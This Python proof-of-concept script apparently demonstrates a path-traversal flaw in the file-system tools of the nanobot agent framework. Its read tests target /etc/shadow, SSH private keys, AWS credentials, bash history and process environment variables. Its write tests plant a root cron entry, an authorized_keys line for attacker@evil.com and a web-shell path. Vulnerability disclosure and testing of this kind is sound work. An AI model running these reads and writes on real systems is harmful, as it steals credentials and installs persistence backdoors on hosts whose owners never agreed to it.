#!/usr/bin/env python3 """ POC: Path Traversal / Unrestricted File Access This script demonstrates that the file system tools in nanobot allow unrestricted file access because `base_dir` is never passed to `_validate_path()`. Affected code: nanobot/agent/tools/filesystem.py - _validate_path() supports base_dir restriction but it's never used - read_file, write_file, edit_file, list_dir all have unrestricted access """ import asyncio import sys import os import tempfile # Add parent directory to path for imports sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(__file__)))) from nanobot.agent.tools.filesystem import ( ReadFileTool, WriteFileTool, EditFileTool, ListDirTool ) class PathTraversalPOC: """Demonstrates path traversal vulnerabilities.""" def __init__(self): self.read_tool = ReadFileTool() self.write_tool = WriteFileTool() self.edit_tool = EditFileTool() self.list_tool = ListDirTool() self.results = [] async def test_read(self, name: str, path: str, expected_risk: str) -> dict: """Test reading a file outside workspace.""" result = { "name": name, "operation": "read", "path": path, "expected_risk": expected_risk, "success": False, "content_preview": None, "error": None } try: content = await self.read_tool.execute(path=path) result["success"] = True result["content_preview"] = content[:300] if content else None except Exception as e: result["error"] = str(e) self.results.append(result) return result async def test_write(self, name: str, path: str, content: str, expected_risk: str) -> dict: """Test writing a file outside workspace.""" result = { "name": name, "operation": "write", "path": path, "expected_risk": expected_risk, "success": False, "error": None } try: output = await self.write_tool.execute(path=path, content=content) result["success"] = "successfully" in output.lower() or "written" in output.lower() or "created" in output.lower() result["output"] = output except Exception as e: result["error"] = str(e) self.results.append(result) return result async def test_list(self, name: str, path: str, expected_risk: str) -> dict: """Test listing a directory outside workspace.""" result = { "name": name, "operation": "list", "path": path, "expected_risk": expected_risk, "success": False, "entries": None, "error": None } try: output = await self.list_tool.execute(path=path) result["success"] = True result["entries"] = output[:500] if output else None except Exception as e: result["error"] = str(e) self.results.append(result) return result async def run_all_tests(self): """Run all path traversal tests.""" print("=" * 60) print("PATH TRAVERSAL / UNRESTRICTED FILE ACCESS POC") print("=" * 60) print() # ==================== READ TESTS ==================== print("--- READ OPERATIONS ---") print() # Test 1: Read /etc/passwd print("[TEST 1] Read /etc/passwd") r = await self.test_read( "etc_passwd", "/etc/passwd", "System user enumeration" ) self._print_result(r) # Test 2: Read /etc/shadow (should fail due to permissions, not restrictions) print("[TEST 2] Read /etc/shadow (permission test)") r = await self.test_read( "etc_shadow", "/etc/shadow", "Password hash disclosure (if readable)" ) self._print_result(r) # Test 3: Read sensitive test file (demonstrates path traversal outside workspace) print("[TEST 3] Read /sensitive/api_keys.txt (test file outside workspace)") r = await self.test_read( "sensitive_test_file", "/sensitive/api_keys.txt", "Sensitive file disclosure - if content contains 'PATH_TRAVERSAL_VULNERABILITY_CONFIRMED', vuln is proven" ) self._print_result(r) # Test 4: Read SSH keys print("[TEST 4] Read SSH Private Key") r = await self.test_read( "ssh_private_key", os.path.expanduser("~/.ssh/id_rsa"), "SSH private key disclosure" ) self._print_result(r) # Test 5: Read bash history print("[TEST 5] Read Bash History") r = await self.test_read( "bash_history", os.path.expanduser("~/.bash_history"), "Command history disclosure" ) self._print_result(r) # Test 6: Read environment file print("[TEST 6] Read /proc/self/environ") r = await self.test_read( "proc_environ", "/proc/self/environ", "Environment variable disclosure via procfs" ) self._print_result(r) # Test 7: Path traversal with .. print("[TEST 7] Path Traversal with ../") r = await self.test_read( "dot_dot_traversal", "/app/../etc/passwd", "Path traversal using ../" ) self._print_result(r) # Test 8: Read AWS credentials (if exists) print("[TEST 8] Read AWS Credentials") r = await self.test_read( "aws_credentials", os.path.expanduser("~/.aws/credentials"), "Cloud credential disclosure" ) self._print_result(r) # ==================== WRITE TESTS ==================== print("--- WRITE OPERATIONS ---") print() # Test 9: Write to /tmp (should succeed) print("[TEST 9] Write to /tmp") r = await self.test_write( "tmp_write", "/tmp/poc_traversal_test.txt", "POC: This file was written via path traversal vulnerability\nTimestamp: " + str(asyncio.get_event_loop().time()), "Arbitrary file write to system directories" ) self._print_result(r) # Test 10: Write cron job (will fail due to permissions but shows intent) print("[TEST 10] Write to /etc/cron.d (permission test)") r = await self.test_write( "cron_write", "/etc/cron.d/poc_malicious", "* * * * * root /tmp/poc_payload.sh", "Cron job injection for persistence" ) self._print_result(r) # Test 11: Write SSH authorized_keys print("[TEST 11] Write SSH Authorized Keys") ssh_dir = os.path.expanduser("~/.ssh") r = await self.test_write( "ssh_authkeys", f"{ssh_dir}/authorized_keys_poc_test", "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ... attacker@evil.com", "SSH backdoor via authorized_keys" ) self._print_result(r) # Test 12: Write to web-accessible location print("[TEST 12] Write to /var/www (if exists)") r = await self.test_write( "www_write", "/var/www/html/poc_shell.php", "", "Web shell deployment" ) self._print_result(r) # Test 13: Overwrite application files print("[TEST 13] Write to Application Directory") r = await self.test_write( "app_overwrite", "/app/poc/results/poc_app_write.txt", "POC: Application file overwrite successful", "Application code/config tampering" ) self._print_result(r) # ==================== LIST TESTS ==================== print("--- LIST OPERATIONS ---") print() # Test 14: List root directory print("[TEST 14] List / (root)") r = await self.test_list( "list_root", "/", "File system enumeration" ) self._print_result(r) # Test 15: List /etc print("[TEST 15] List /etc") r = await self.test_list( "list_etc", "/etc", "Configuration enumeration" ) self._print_result(r) # Test 16: List home directory print("[TEST 16] List Home Directory") r = await self.test_list( "list_home", os.path.expanduser("~"), "User file enumeration" ) self._print_result(r) # Test 17: List /proc print("[TEST 17] List /proc") r = await self.test_list( "list_proc", "/proc", "Process enumeration via procfs" ) self._print_result(r) self._print_summary() return self.results def _print_result(self, result: dict): """Print a single test result.""" if result["success"]: status = "⚠️ SUCCESS (VULNERABLE)" elif result.get("error") and "permission" in result["error"].lower(): status = "🔒 PERMISSION DENIED (not a code issue)" elif result.get("error") and "not found" in result["error"].lower(): status = "📁 FILE NOT FOUND" else: status = "❌ FAILED" print(f" Status: {status}") print(f" Risk: {result['expected_risk']}") if result.get("content_preview"): preview = result["content_preview"][:150].replace('\n', '\\n') print(f" Content: {preview}...") if result.get("entries"): print(f" Entries: {result['entries'][:150]}...") if result.get("output"): print(f" Output: {result['output'][:100]}") if result.get("error"): print(f" Error: {result['error'][:100]}") print() def _print_summary(self): """Print test summary.""" print("=" * 60) print("SUMMARY") print("=" * 60) read_success = sum(1 for r in self.results if r["operation"] == "read" and r["success"]) write_success = sum(1 for r in self.results if r["operation"] == "write" and r["success"]) list_success = sum(1 for r in self.results if r["operation"] == "list" and r["success"]) total_success = read_success + write_success + list_success print(f"Read operations successful: {read_success}") print(f"Write operations successful: {write_success}") print(f"List operations successful: {list_success}") print(f"Total successful (vulnerable): {total_success}/{len(self.results)}") print() if total_success > 0: print("⚠️ VULNERABILITY CONFIRMED: Unrestricted file system access") print() print("Successful operations:") for r in self.results: if r["success"]: print(f" - [{r['operation'].upper()}] {r['path']}") return { "read_success": read_success, "write_success": write_success, "list_success": list_success, "total_success": total_success, "total_tests": len(self.results), "vulnerability_confirmed": total_success > 0 } async def main(): poc = PathTraversalPOC() results = await poc.run_all_tests() # Write results to file import json results_path = "/results/path_traversal_results.json" if os.path.isdir("/results") else "path_traversal_results.json" with open(results_path, "w") as f: json.dump(results, f, indent=2, default=str) print(f"\nResults written to: {results_path}") if __name__ == "__main__": asyncio.run(main())